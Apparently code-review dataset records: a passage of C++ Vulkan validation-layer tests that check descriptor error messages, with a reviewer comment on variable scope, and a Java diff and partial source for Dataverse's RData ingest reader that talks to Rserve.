vk::AllocateDescriptorSets(m_device->handle(), &ds_alloc_info, &ds); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorPool(m_device->handle(), pool, nullptr); vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); } TEST_F(VkLayerTest, CreateDescriptorUpdateTemplate) { TEST_DESCRIPTION("Verify error messages for invalid vkCreateDescriptorUpdateTemplate calls."); if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s Did not find VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME; skipped.\n", kSkipPrefix); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); // Note: Includes workaround for some implementations which incorrectly return 0 maxPushDescriptors if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME) && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_DESCRIPTOR_UPDATE_TEMPLATE_EXTENSION_NAME) && (GetPushDescriptorProperties(instance(), gpu()).maxPushDescriptors > 0)) { m_device_extension_names.push_back(VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME); m_device_extension_names.push_back(VK_KHR_DESCRIPTOR_UPDATE_TEMPLATE_EXTENSION_NAME); } else { printf("%s Push Descriptors and Descriptor Update Template Extensions not supported, skipping tests\n", kSkipPrefix); return; } ASSERT_NO_FATAL_FAILURE(InitState()); VkDescriptorSetLayoutBinding dsl_binding = {}; dsl_binding.binding = 0; dsl_binding.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_binding.descriptorCount = 1; dsl_binding.stageFlags = VK_SHADER_STAGE_ALL; dsl_binding.pImmutableSamplers = NULL; const VkDescriptorSetLayoutObj ds_layout_ub(m_device, {dsl_binding}); const VkDescriptorSetLayoutObj ds_layout_ub1(m_device, {dsl_binding}); const VkDescriptorSetLayoutObj ds_layout_ub_push(m_device, {dsl_binding}, VK_DESCRIPTOR_SET_LAYOUT_CREATE_PUSH_DESCRIPTOR_BIT_KHR); const VkPipelineLayoutObj pipeline_layout(m_device, {{&ds_layout_ub, &ds_layout_ub1, &ds_layout_ub_push}}); PFN_vkCreateDescriptorUpdateTemplateKHR vkCreateDescriptorUpdateTemplateKHR = (PFN_vkCreateDescriptorUpdateTemplateKHR)vk::GetDeviceProcAddr(m_device->device(), "vkCreateDescriptorUpdateTemplateKHR"); ASSERT_NE(vkCreateDescriptorUpdateTemplateKHR, nullptr); PFN_vkDestroyDescriptorUpdateTemplateKHR vkDestroyDescriptorUpdateTemplateKHR = (PFN_vkDestroyDescriptorUpdateTemplateKHR)vk::GetDeviceProcAddr(m_device->device(), "vkDestroyDescriptorUpdateTemplateKHR"); ASSERT_NE(vkDestroyDescriptorUpdateTemplateKHR, nullptr); uint64_t badhandle = 0xcadecade; VkDescriptorUpdateTemplateEntry entries = {0, 0, 1, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 0, sizeof(VkBuffer)}; VkDescriptorUpdateTemplateCreateInfo create_info = {}; create_info.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_UPDATE_TEMPLATE_CREATE_INFO; create_info.pNext = nullptr; create_info.flags = 0; create_info.descriptorUpdateEntryCount = 1; create_info.pDescriptorUpdateEntries = &entries; auto do_test = [&](std::string err) { VkDescriptorUpdateTemplateKHR dut = VK_NULL_HANDLE; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, err); if (VK_SUCCESS == vkCreateDescriptorUpdateTemplateKHR(m_device->handle(), &create_info, nullptr, &dut)) { vkDestroyDescriptorUpdateTemplateKHR(m_device->handle(), dut, nullptr); } m_errorMonitor->VerifyFound(); }; // Descriptor set type template create_info.templateType = VK_DESCRIPTOR_UPDATE_TEMPLATE_TYPE_DESCRIPTOR_SET; // descriptorSetLayout is NULL do_test("VUID-VkDescriptorUpdateTemplateCreateInfo-templateType-00350"); // Bad pipelineLayout handle, to be ignored if templatType is DESCRIPTOR_SET { create_info.pipelineLayout = reinterpret_cast<VkPipelineLayout &>(badhandle); create_info.descriptorSetLayout = ds_layout_ub.handle(); VkDescriptorUpdateTemplateKHR dut = VK_NULL_HANDLE; m_errorMonitor->ExpectSuccess(); if (VK_SUCCESS == vkCreateDescriptorUpdateTemplateKHR(m_device->handle(), &create_info, nullptr, &dut)) { vkDestroyDescriptorUpdateTemplateKHR(m_device->handle(), dut, nullptr); } m_errorMonitor->VerifyNotFound(); } create_info.templateType = VK_DESCRIPTOR_UPDATE_TEMPLATE_TYPE_PUSH_DESCRIPTORS_KHR; // Bad pipelineLayout handle do_test("VUID-VkDescriptorUpdateTemplateCreateInfo-templateType-00352"); create_info.pipelineBindPoint = VK_PIPELINE_BIND_POINT_COMPUTE; create_info.pipelineLayout = pipeline_layout.handle(); create_info.set = 2; // Bad bindpoint -- force fuzz the bind point memset(&create_info.pipelineBindPoint, 0xFE, sizeof(create_info.pipelineBindPoint)); do_test("VUID-VkDescriptorUpdateTemplateCreateInfo-templateType-00351"); create_info.pipelineBindPoint = VK_PIPELINE_BIND_POINT_COMPUTE; // Bad pipeline layout create_info.pipelineLayout = VK_NULL_HANDLE; do_test("VUID-VkDescriptorUpdateTemplateCreateInfo-templateType-00352"); create_info.pipelineLayout = pipeline_layout.handle(); // Wrong set # create_info.set = 0; do_test("VUID-VkDescriptorUpdateTemplateCreateInfo-templateType-00353"); // Invalid set # create_info.set = 42; do_test("VUID-VkDescriptorUpdateTemplateCreateInfo-templateType-00353"); // Bad descriptorSetLayout handle, to be ignored if templateType is PUSH_DESCRIPTORS { create_info.set = 2; create_info.descriptorSetLayout = reinterpret_cast<VkDescriptorSetLayout &>(badhandle); VkDescriptorUpdateTemplateKHR dut = VK_NULL_HANDLE; m_errorMonitor->ExpectSuccess(); if (VK_SUCCESS == vkCreateDescriptorUpdateTemplateKHR(m_device->handle(), &create_info, nullptr, &dut)) { vkDestroyDescriptorUpdateTemplateKHR(m_device->handle(), dut, nullptr); } m_errorMonitor->VerifyNotFound(); } // Bad descriptorSetLayout handle create_info.templateType = VK_DESCRIPTOR_UPDATE_TEMPLATE_TYPE_DESCRIPTOR_SET; do_test("VUID-VkDescriptorUpdateTemplateCreateInfo-templateType-00350"); } TEST_F(VkLayerTest, InlineUniformBlockEXT) { TEST_DESCRIPTION("Test VK_EXT_inline_uniform_block."); if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s Did not find required instance extension %s; skipped.\n", kSkipPrefix, VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); std::array<const char *, 2> required_device_extensions = {VK_KHR_MAINTENANCE1_EXTENSION_NAME, VK_EXT_INLINE_UNIFORM_BLOCK_EXTENSION_NAME}; for (auto device_extension : required_device_extensions) { if (DeviceExtensionSupported(gpu(), nullptr, device_extension)) { m_device_extension_names.push_back(device_extension); } else { printf("%s %s Extension not supported, skipping tests\n", kSkipPrefix, device_extension); return; } } // Enable descriptor indexing if supported, but don't require it. bool supportsDescriptorIndexing = true; required_device_extensions = {VK_KHR_MAINTENANCE3_EXTENSION_NAME, VK_EXT_DESCRIPTOR_INDEXING_EXTENSION_NAME}; for (auto device_extension : required_device_extensions) { if (DeviceExtensionSupported(gpu(), nullptr, device_extension)) { m_device_extension_names.push_back(device_extension); } else { printf("%s %s Extension not supported, skipping tests\n", kSkipPrefix, device_extension); supportsDescriptorIndexing = false; return; } } PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); ASSERT_TRUE(vkGetPhysicalDeviceFeatures2KHR != nullptr); auto descriptor_indexing_features = lvl_init_struct<VkPhysicalDeviceDescriptorIndexingFeaturesEXT>(); void *pNext = supportsDescriptorIndexing ? &descriptor_indexing_features : nullptr; // Create a device that enables inline_uniform_block auto inline_uniform_block_features = lvl_init_struct<VkPhysicalDeviceInlineUniformBlockFeaturesEXT>(pNext); auto features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&inline_uniform_block_features); vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); PFN_vkGetPhysicalDeviceProperties2KHR vkGetPhysicalDeviceProperties2KHR = (PFN_vkGetPhysicalDeviceProperties2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceProperties2KHR"); assert(vkGetPhysicalDeviceProperties2KHR != nullptr); // Get the inline uniform block limits auto inline_uniform_props = lvl_init_struct<VkPhysicalDeviceInlineUniformBlockPropertiesEXT>(); auto prop2 = lvl_init_struct<VkPhysicalDeviceProperties2KHR>(&inline_uniform_props); vkGetPhysicalDeviceProperties2KHR(gpu(), &prop2); ASSERT_NO_FATAL_FAILURE(InitState(nullptr, &features2)); VkDescriptorSetLayoutBinding dslb = {}; std::vector<VkDescriptorSetLayoutBinding> dslb_vec = {}; VkDescriptorSetLayoutCreateInfo ds_layout_ci = {}; ds_layout_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_LAYOUT_CREATE_INFO; VkDescriptorSetLayout ds_layout = {}; // Test too many bindings dslb_vec.clear(); dslb.binding = 0; dslb.descriptorType = VK_DESCRIPTOR_TYPE_INLINE_UNIFORM_BLOCK_EXT; dslb.descriptorCount = 4; dslb.stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT; if (inline_uniform_props.maxInlineUniformBlockSize < dslb.descriptorCount) { printf("%sDescriptorCount exceeds InlineUniformBlockSize limit, skipping tests\n", kSkipPrefix); return; } uint32_t maxBlocks = std::max(inline_uniform_props.maxPerStageDescriptorInlineUniformBlocks, inline_uniform_props.maxDescriptorSetInlineUniformBlocks); for (uint32_t i = 0; i < 1 + maxBlocks; ++i) { dslb.binding = i; dslb_vec.push_back(dslb); } ds_layout_ci.bindingCount = dslb_vec.size(); ds_layout_ci.pBindings = dslb_vec.data(); VkResult err = vk::CreateDescriptorSetLayout(m_device->device(), &ds_layout_ci, NULL, &ds_layout); ASSERT_VK_SUCCESS(err); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkPipelineLayoutCreateInfo-descriptorType-02214"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkPipelineLayoutCreateInfo-descriptorType-02216"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkPipelineLayoutCreateInfo-descriptorType-02215"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkPipelineLayoutCreateInfo-descriptorType-02217"); VkPipelineLayoutCreateInfo pipeline_layout_ci = {}; pipeline_layout_ci.sType = VK_STRUCTURE_TYPE_PIPELINE_LAYOUT_CREATE_INFO; pipeline_layout_ci.pNext = NULL; pipeline_layout_ci.setLayoutCount = 1; pipeline_layout_ci.pSetLayouts = &ds_layout; VkPipelineLayout pipeline_layout = VK_NULL_HANDLE; err = vk::CreatePipelineLayout(m_device->device(), &pipeline_layout_ci, NULL, &pipeline_layout); m_errorMonitor->VerifyFound(); vk::DestroyPipelineLayout(m_device->device(), pipeline_layout, NULL); pipeline_layout = VK_NULL_HANDLE; vk::DestroyDescriptorSetLayout(m_device->device(), ds_layout, nullptr); ds_layout = VK_NULL_HANDLE; // Single binding that's too large and is not a multiple of 4 dslb.binding = 0; dslb.descriptorCount = inline_uniform_props.maxInlineUniformBlockSize + 1; ds_layout_ci.bindingCount = 1; ds_layout_ci.pBindings = &dslb; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetLayoutBinding-descriptorType-02209"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetLayoutBinding-descriptorType-02210"); err = vk::CreateDescriptorSetLayout(m_device->device(), &ds_layout_ci, NULL, &ds_layout); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorSetLayout(m_device->device(), ds_layout, nullptr); ds_layout = VK_NULL_HANDLE; // Pool size must be a multiple of 4 VkDescriptorPoolSize ds_type_count = {}; ds_type_count.type = VK_DESCRIPTOR_TYPE_INLINE_UNIFORM_BLOCK_EXT; ds_type_count.descriptorCount = 33; VkDescriptorPoolCreateInfo ds_pool_ci = {}; ds_pool_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_POOL_CREATE_INFO; ds_pool_ci.pNext = NULL; ds_pool_ci.flags = 0; ds_pool_ci.maxSets = 2; ds_pool_ci.poolSizeCount = 1; ds_pool_ci.pPoolSizes = &ds_type_count; VkDescriptorPool ds_pool = VK_NULL_HANDLE; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorPoolSize-type-02218"); err = vk::CreateDescriptorPool(m_device->device(), &ds_pool_ci, NULL, &ds_pool); m_errorMonitor->VerifyFound(); if (ds_pool) { vk::DestroyDescriptorPool(m_device->handle(), ds_pool, nullptr); ds_pool = VK_NULL_HANDLE; } // Create a valid pool ds_type_count.descriptorCount = 32; err = vk::CreateDescriptorPool(m_device->device(), &ds_pool_ci, NULL, &ds_pool); m_errorMonitor->VerifyNotFound(); // Create two valid sets with 8 bytes each dslb_vec.clear(); dslb.binding = 0; dslb.descriptorType = VK_DESCRIPTOR_TYPE_INLINE_UNIFORM_BLOCK_EXT; dslb.descriptorCount = 8; dslb.stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT; dslb_vec.push_back(dslb); dslb.binding = 1; dslb_vec.push_back(dslb); ds_layout_ci.bindingCount = dslb_vec.size(); ds_layout_ci.pBindings = &dslb_vec[0]; err = vk::CreateDescriptorSetLayout(m_device->device(), &ds_layout_ci, NULL, &ds_layout); m_errorMonitor->VerifyNotFound(); VkDescriptorSet descriptor_sets[2]; VkDescriptorSetLayout set_layouts[2] = {ds_layout, ds_layout}; VkDescriptorSetAllocateInfo alloc_info = {}; alloc_info.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_ALLOCATE_INFO; alloc_info.descriptorSetCount = 2; alloc_info.descriptorPool = ds_pool; alloc_info.pSetLayouts = set_layouts; err = vk::AllocateDescriptorSets(m_device->device(), &alloc_info, descriptor_sets); m_errorMonitor->VerifyNotFound(); // Test invalid VkWriteDescriptorSet parameters (array element and size must be multiple of 4) VkWriteDescriptorSet descriptor_write = {}; descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptor_sets[0]; descriptor_write.dstBinding = 0; descriptor_write.dstArrayElement = 0; descriptor_write.descriptorCount = 3; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_INLINE_UNIFORM_BLOCK_EXT; uint32_t dummyData[8] = {}; VkWriteDescriptorSetInlineUniformBlockEXT write_inline_uniform = {}; write_inline_uniform.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET_INLINE_UNIFORM_BLOCK_EXT; write_inline_uniform.dataSize = 3; write_inline_uniform.pData = &dummyData[0]; descriptor_write.pNext = &write_inline_uniform; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-02220"); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); descriptor_write.dstArrayElement = 1; descriptor_write.descriptorCount = 4; write_inline_uniform.dataSize = 4; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-02219"); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); descriptor_write.pNext = nullptr; descriptor_write.dstArrayElement = 0; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-descriptorType-02221"); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); descriptor_write.pNext = &write_inline_uniform; vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyNotFound(); // Test invalid VkCopyDescriptorSet parameters (array element and size must be multiple of 4) VkCopyDescriptorSet copy_ds_update = {}; copy_ds_update.sType = VK_STRUCTURE_TYPE_COPY_DESCRIPTOR_SET; copy_ds_update.srcSet = descriptor_sets[0]; copy_ds_update.srcBinding = 0; copy_ds_update.srcArrayElement = 0; copy_ds_update.dstSet = descriptor_sets[1]; copy_ds_update.dstBinding = 0; copy_ds_update.dstArrayElement = 0; copy_ds_update.descriptorCount = 4; copy_ds_update.srcArrayElement = 1; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkCopyDescriptorSet-srcBinding-02223"); vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyFound(); copy_ds_update.srcArrayElement = 0; copy_ds_update.dstArrayElement = 1; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkCopyDescriptorSet-dstBinding-02224"); vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyFound(); copy_ds_update.dstArrayElement = 0; copy_ds_update.descriptorCount = 5; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkCopyDescriptorSet-srcBinding-02225"); vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyFound(); copy_ds_update.descriptorCount = 4; vk::UpdateDescriptorSets(m_device->device(), 0, NULL, 1, &copy_ds_update); m_errorMonitor->VerifyNotFound(); vk::DestroyDescriptorPool(m_device->handle(), ds_pool, nullptr); vk::DestroyDescriptorSetLayout(m_device->device(), ds_layout, nullptr); } TEST_F(VkLayerTest, WrongdstArrayElement) { ASSERT_NO_FATAL_FAILURE(Init()); OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_INPUT_ATTACHMENT, 1, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); VkImageObj image(m_device); image.Init(32, 32, 1, VK_FORMAT_B8G8R8A8_UNORM, VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); VkImageView view = image.targetView(VK_FORMAT_B8G8R8A8_UNORM); VkDescriptorImageInfo image_info = {}; image_info.imageView = view; image_info.sampler = VK_NULL_HANDLE; image_info.imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL; descriptor_set.image_infos.emplace_back(image_info); VkWriteDescriptorSet descriptor_write; memset(&descriptor_write, 0, sizeof(descriptor_write)); descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstSet = descriptor_set.set_; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_INPUT_ATTACHMENT; descriptor_write.pImageInfo = descriptor_set.image_infos.data(); descriptor_write.pBufferInfo = nullptr; descriptor_write.pTexelBufferView = nullptr; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstArrayElement-00321"); descriptor_write.dstArrayElement = 1; descriptor_set.descriptor_writes.emplace_back(descriptor_write); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); OneOffDescriptorSet descriptor_set2(m_device, { {0, VK_DESCRIPTOR_TYPE_INPUT_ATTACHMENT, 2, VK_SHADER_STAGE_ALL, nullptr}, {1, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); descriptor_set2.image_infos.emplace_back(image_info); descriptor_set2.image_infos.emplace_back(image_info); descriptor_write.dstSet = descriptor_set2.set_; descriptor_write.descriptorCount = 2; descriptor_write.pImageInfo = descriptor_set2.image_infos.data(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstArrayElement-00321"); descriptor_write.dstArrayElement = 1; descriptor_set2.descriptor_writes.emplace_back(descriptor_write); descriptor_set2.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkWriteDescriptorSet-dstArrayElement-00321"); descriptor_write.dstArrayElement = 3; descriptor_set2.descriptor_writes.clear(); descriptor_set2.descriptor_writes.emplace_back(descriptor_write); descriptor_set2.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); }
1
12,542
Can you tighten scope by moving to of these variables? i.e. Move to ~4372?
KhronosGroup-Vulkan-ValidationLayers
cpp
@@ -90,7 +90,7 @@ public class RDATAFileReader extends TabularDataFileReader { // RServe static variables private static String RSERVE_HOST = System.getProperty("dataverse.rserve.host"); private static String RSERVE_USER = System.getProperty("dataverse.rserve.user"); - private static String RSERVE_PASSWORD = System.getProperty("dataverse.rserve.pwrd"); + private static String RSERVE_PASSWORD = System.getProperty("dataverse.rserve.password"); private static int RSERVE_PORT; // TODO:
1
/* Copyright (C) 2005-2013, by the President and Fellows of Harvard College. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Dataverse Network - A web application to share, preserve and analyze research data. Developed at the Institute for Quantitative Social Science, Harvard University. Version 3.0. */ package edu.harvard.iq.dataverse.ingest.tabulardata.impl.plugins.rdata; import java.io.*; import java.io.FileReader; import java.io.InputStreamReader; import java.text.*; import java.util.logging.*; import java.util.*; import java.security.NoSuchAlgorithmException; import javax.inject.Inject; // Rosuda Wrappers and Methods for R-calls to Rserve import org.rosuda.REngine.REXP; import org.rosuda.REngine.REXPMismatchException; import org.rosuda.REngine.RList; import org.rosuda.REngine.Rserve.RFileInputStream; import org.rosuda.REngine.Rserve.RFileOutputStream; import org.rosuda.REngine.Rserve.*; import edu.harvard.iq.dataverse.DataTable; import edu.harvard.iq.dataverse.datavariable.DataVariable; import edu.harvard.iq.dataverse.datavariable.VariableCategory; import edu.harvard.iq.dataverse.ingest.plugin.spi.*; import edu.harvard.iq.dataverse.ingest.tabulardata.TabularDataFileReader; import edu.harvard.iq.dataverse.ingest.tabulardata.spi.TabularDataFileReaderSpi; import edu.harvard.iq.dataverse.ingest.tabulardata.TabularDataIngest; import edu.harvard.iq.dataverse.rserve.*; import javax.naming.Context; import javax.naming.InitialContext; import javax.naming.NamingException; import org.apache.commons.lang.RandomStringUtils; import org.apache.commons.lang.ArrayUtils; /** * Dataverse 4.0 implementation of <code>TabularDataFileReader</code> for the * RData Binary Format. * * Based on the original implementation for DVN v3.*, by Matt Owen (2012-2013), * completed by Leonid Andreev in 2013. * * This version is a serious re-write of the plugin, using the new 4.0 * ingest plugin architecture. * * original * @author Matthew Owen * @author Leonid Andreev * This implementation uses external R-Scripts to do the bulk of the processing. */ public class RDATAFileReader extends TabularDataFileReader { // Date-time things public static final String[] FORMATS = { "other", "date", "date-time", "date-time-timezone" }; // R-ingest recognition files private static final String[] FORMAT_NAMES = { "RDATA", "Rdata", "rdata" }; private static final String[] EXTENSIONS = { "Rdata", "rdata" }; private static final String[] MIME_TYPE = { "application/x-rlang-transport" }; // R Scripts static private String RSCRIPT_CREATE_WORKSPACE = ""; static private String RSCRIPT_DATASET_INFO_SCRIPT = ""; static private String RSCRIPT_GET_DATASET = ""; static private String RSCRIPT_GET_LABELS = ""; static private String RSCRIPT_WRITE_DVN_TABLE = ""; // RServe static variables private static String RSERVE_HOST = System.getProperty("dataverse.rserve.host"); private static String RSERVE_USER = System.getProperty("dataverse.rserve.user"); private static String RSERVE_PASSWORD = System.getProperty("dataverse.rserve.pwrd"); private static int RSERVE_PORT; // TODO: // we're not using these time/data formats for anything, are we? // DATE FORMATS private static SimpleDateFormat[] DATE_FORMATS = new SimpleDateFormat[] { new SimpleDateFormat("yyyy-MM-dd") }; // TIME FORMATS private static SimpleDateFormat[] TIME_FORMATS = new SimpleDateFormat[] { // Date-time up to milliseconds with timezone, e.g. 2013-04-08 13:14:23.102 -0500 new SimpleDateFormat("yyyy-MM-dd HH:mm:ss.SSS z"), // Date-time up to milliseconds, e.g. 2013-04-08 13:14:23.102 new SimpleDateFormat("yyyy-MM-dd HH:mm:ss.SSS"), // Date-time up to seconds with timezone, e.g. 2013-04-08 13:14:23 -0500 new SimpleDateFormat("yyyy-MM-dd HH:mm:ss z"), // Date-time up to seconds and no timezone, e.g. 2013-04-08 13:14:23 new SimpleDateFormat("yyyy-MM-dd HH:mm:ss") }; // Logger private static final Logger LOG = Logger.getLogger(RDATAFileReader.class.getPackage().getName()); TabularDataIngest ingesteddata = new TabularDataIngest(); private DataTable dataTable = new DataTable(); // Process ID, used partially in the generation of temporary directories private String mPID; // Object containing all the informatin for an R-workspace (including // temporary directories on and off server) private RWorkspace mRWorkspace; // Number formatter NumberFormat doubleNumberFormatter = new DecimalFormat(); // Builds R Requests for an R-server private RRequestBuilder mRequestBuilder; /* * Initialize Static Variables * This is primarily to construct the R-Script */ static { /* * Set defaults fallbacks for class properties */ if (RSERVE_HOST == null) RSERVE_HOST = "localhost"; if (RSERVE_USER == null) RSERVE_USER = "rserve"; if (RSERVE_PASSWORD == null) RSERVE_PASSWORD = "rserve"; if (System.getProperty("dataverse.ingest.rserve.port") == null) RSERVE_PORT = 6311; else RSERVE_PORT = Integer.parseInt(System.getProperty("dataverse.rserve.port")); // Load R Scripts into memory, so that we can run them via R-serve RSCRIPT_WRITE_DVN_TABLE = readLocalResource("scripts/write.table.R"); RSCRIPT_GET_DATASET = readLocalResource("scripts/get.dataset.R"); RSCRIPT_CREATE_WORKSPACE = readLocalResource("scripts/create.workspace.R"); RSCRIPT_GET_LABELS = readLocalResource("scripts/get.labels.R"); RSCRIPT_DATASET_INFO_SCRIPT = readLocalResource("scripts/dataset.info.script.R"); LOG.finer("R SCRIPTS AS STRINGS --------------"); LOG.finer(RSCRIPT_WRITE_DVN_TABLE); LOG.finer(RSCRIPT_GET_DATASET); LOG.fine(RSCRIPT_CREATE_WORKSPACE); LOG.finer(RSCRIPT_GET_LABELS); LOG.finer(RSCRIPT_DATASET_INFO_SCRIPT); LOG.finer("END OF R SCRIPTS AS STRINGS -------"); } /* * TODO: * Switch to the implementation in iq.dataverse.rserve * -- L.A. 4.0 alpha 1 */ private class RWorkspace { public String mParent, mWeb, mDvn, mDsb; public File mDataFile, mCsvDataFile; public RRequest mRRequest; public BufferedInputStream mInStream; /** * */ public RWorkspace () { mParent = mWeb = mDvn = mDsb = ""; mDataFile = null; mCsvDataFile = null; mInStream = null; } /** * Create the Actual R Workspace */ public void create () { try { LOG.fine("RDATAFileReader: Creating R Workspace"); RRequestBuilder scriptBuilder = mRequestBuilder.script(RSCRIPT_CREATE_WORKSPACE); LOG.fine("got a sript request builder"); RRequest scriptRequest = scriptBuilder.build(); LOG.fine("script request built."); /* REXP result = mRequestBuilder .script(RSCRIPT_CREATE_WORKSPACE) .build() .eval(); */ REXP result = scriptRequest.eval(); LOG.fine("evaluated the script"); RList directoryNames = result.asList(); mParent = null; if (directoryNames != null) { if (directoryNames.at("parent") != null) { mParent = directoryNames.at("parent").asString(); } else { LOG.fine("WARNING: directoryNames at \"parent\" is null!"); if(directoryNames.isEmpty()) { LOG.fine("WARNING: directoryNames is empty!"); } else { Set<String> dirKeySet = directoryNames.keySet(); Iterator iter = dirKeySet.iterator(); String key; while (iter.hasNext()) { key = (String) iter.next(); LOG.fine("directoryNames list key: "+key); } } } } else { LOG.fine("WARNING: directoryNames is null!"); } LOG.fine(String.format("RDATAFileReader: Parent directory of R Workspace is %s", mParent)); LOG.fine("RDATAFileReader: Creating file handle"); mDataFile = new File(mParent, "data.Rdata"); } catch (Exception E) { LOG.warning("RDATAFileReader: Could not create R workspace"); mParent = mWeb = mDvn = mDsb = ""; } } /** * Destroy the Actual R Workspace */ public void destroy () { String destroyerScript = new StringBuilder("") .append(String.format("unlink(\"%s\", TRUE, TRUE)", mParent)) .toString(); try { LOG.fine("RDATAFileReader: Destroying R Workspace"); mRRequest = mRequestBuilder .script(destroyerScript) .build(); mRRequest.eval(); LOG.fine("RDATAFileReader: DESTROYED R Workspace"); } catch (Exception ex) { LOG.warning("RDATAFileReader: R Workspace was not destroyed"); LOG.fine(ex.getMessage()); } } /** * Create the Data File to Use for Analysis, etc. */ public File dataFile (String target, String prefix, int size) { String fileName = String.format("DVN.dataframe.%s.Rdata", mPID); mDataFile = new 